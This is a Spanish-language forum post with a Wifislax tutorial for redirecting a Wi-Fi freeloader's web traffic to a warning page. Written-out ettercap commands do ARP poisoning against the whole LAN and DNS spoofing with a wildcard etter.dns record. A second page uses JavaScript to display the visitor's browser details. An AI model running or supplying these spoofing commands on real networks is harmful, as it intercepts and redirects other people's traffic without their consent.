Cazador cazado con wifislax

Es una manual fresco, con nuevos aires, a mi me ha gustado mucho el articulo, su autor es geminis_demon y las posibilidades son muchas, ademas que no se le hace daño alguno, a no ser que padezca del corazón…..

Hola, os voy a explicar una forma rápida y sencilla de ahuyentar a un vecino que se está colando en tu red.

Lo que vamos a hacer es crear un pequeño servidor local donde pondremos un index sencillo con un mensaje para nuestro vecino, después con ettercap haremos un dns spoof de forma que cuando el intruso intente acceder a cualquier página web será redireccionado a nuestro servidor local y verá el mensaje que le hemos dejado.

Empezamos creando el archivo html con el mensaje para nuestro querido vecino. Yo usaré este:

<HTML>
<HEAD>
<TITLE>ACCESO DENEGADO</TITLE>
</HEAD>
<BODY BGCOLOR=”BLACK” TEXT=”RED”>
<TABLE WIDTH=”100%” HEIGHT=”100%”>
<TR>
<TD VALIGN=”MIDDLE” ALIGN=”CENTER”>
<H1><B>TE ESTOY VIGILANDO, NO ME ROBES EL WIFI.</B></H1>
</TD>
</TR>
</TABLE>
</BODY>
</HTML>

 

Lo guardamos en el escritorio con el nombre index.html

Para crear el servidor http vamos a usar Ghost Phisher, podríamos usar Xampp, lighttp o cualquier otro servidor web pero he elegido Ghost Phisher por que ya viene de serie en Wifislax y así no tenemos que instalar ninguna aplicación extra.

Bien, pues abrimos Ghost Phisher y nos vamos a la pestaña “Fake HTTP Server”. Seleccionamos la interface, seleccionamos el archivo html que hemos creado antes y marcamos la casilla “Hosting Mode”.

Quedaría así:

Pulsamos en “Start” y se pondrá en marcha el servidor http.

Abrimos una terminal y ejecutamos lo siguientes comandos:

Código:
echo “* A 192.168.1.138” >/usr/share/ettercap/etter.dns
Código:
ettercap -T -q -P autoadd -M arp // // -i wlan0 & ettercap -T -q -P dns_spoof -i wlan0

Mi IP interna es 192.168.1.138 y la interface con la que estoy conectado a internet es wlan0 lógicamente tendréis que poner vuestra IP y vuestra interface.

Ahora cuando el vecino intente acceder a cualquier página verá esto en su navegador:

Como podréis comprobar, no soy diseñador gráfico, que cada uno se curre su index  Grin

Saludos.

Podemos imagina todo lo que queramos jejej, incluso un simple ejemplo con Javascript

http://www.seguridadwireless.net/htm/cazado.html

Por si quereis el codigo, y hacer vuestras pruebas:

<!DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.0 Transitional//EN” “http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd”>
<html xmlns=”http://www.w3.org/1999/xhtml”>
<head>
<meta http-equiv=”Content-Type” content=”text/html; charset=utf-8″ />
<title>Control seguridad antiespionaje</title>
<script language=”javascript” type=”text/javascript”>
function procedencia() {
var informacion = document.referrer //inormacion de la procedencia
var longitud = informacion.length
var x = 0

while (x < longitud) { //trocea el resultado porque es muy largo
document.write( informacion.substring(x, x + 16) + ‘ ‘ )
x += 16
}
}

function navegador() {
document.write(navigator.appName)
}

function plataforma() {
document.write(navigator.platform)
}

function version() {
document.write(navigator.appVersion)
}

function historial() {
document.write(history.length)
}

function check_java() {
if (navigator.javaEnabled())
document.write(‘Sí’)
else
document.write(‘No’)
}

function check_taint() {
if (navigator.taintEnabled())
document.write(‘Sí’)
else
document.write(‘No’)
}

</script>
</head>

<body bgcolor=”BLACK” text=”RED”>
<table width=”100%” height=”100%”>
<tr><td valign=”MIDDLE” align=”CENTER”>
<H1><B>TE ESTOY VIGILANDO, NO ME ROBES EL WIFI.</B></H1>
</td></tr>
<tr><td valign=”MIDDLE” align=”CENTER”>
<p><small>Procedencia</small>
<br><b><script LANGUAGE=”JavaScript”>procedencia()</script></b></p>
<p><small>Cliente</small><br><b><script LANGUAGE=”JavaScript”>navegador()</script></b></p>
<p><small>Versión</small><br><b><script LANGUAGE=”JavaScript”>version()</script></b></p>
<p><small>Plataforma (1)</small><br><b><script LANGUAGE=”JavaScript”>plataforma()</script></b></p>
<p><small>Número de páginas visitadas</small><br><b><script LANGUAGE=”JavaScript”>historial()</script></b></p>
<p><small>¿Habilitado Java?</small><br><b><script LANGUAGE=”JavaScript”>check_java()</script></b></p>
<p><small>¿Habilitado Taint? (2)</small><br><b><script LANGUAGE=”JavaScript”>check_taint()</script></b>
</td></tr>
</table>
</body>
</html>

La imaginación es libre…………..